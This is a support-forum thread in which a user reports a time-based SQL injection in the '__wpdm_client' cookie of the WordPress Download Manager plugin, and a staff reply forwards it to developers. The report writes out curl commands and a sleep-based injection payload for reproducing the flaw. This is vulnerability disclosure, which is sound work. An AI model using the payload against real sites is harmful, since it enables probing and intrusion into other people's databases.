Security issue for SQL injection attack - WordPress Download Manager

This topic has 1 reply, 2 voices, and was last updated 4 years, 4 months ago by Tanvir.

Viewing 2 posts - 1 through 2 (of 2 total)

Oct 4, 2021 at 11:50 pm

#162753

Participant

I would like to ask you about how to inform vulnerability issue for Download Manager.
Also request to do some countermeasure for this issue.

Issue: A SQL injection attack on the cookie “__wpdm_client” will result in unintended behavior.

Operation:
STEP 1: Run “curl” command as follow.
curl -i -c C:\Cookie\Cookie.txt http://[site address]/download/[File name]/?wpdmdl=[File number]

STEP 2: Open “C:\Cookie\Cookie.txt” and add as below comments with red color.
#HttpOnly_localhost FALSE /download/XXXX/ FALSE 0 __wpdm_client abcdefghijklmn’%2b(select*from(select(sleep(20)))a)%2b’

STEP 3: Run “curl” command as follow
curl -i -b C:\Cookie\Cookie.txt http://[Site addres]/download/[File name]/?wpdmdl=[File number]

STEP 4: To show the file, have to wait 20 seconds.

I am looking forward to your feedback.

Best regards,

Oct 5, 2021 at 3:31 am

#162762

Spectator

Tanvir

Hello,
Thanks for mentioning the issue.
I have forwarded the issue to the developer team. Our developer team will look for it.
Regards.

Viewing 2 posts - 1 through 2 (of 2 total)

The topic "Security issue for SQL injection attack" is closed to new replies.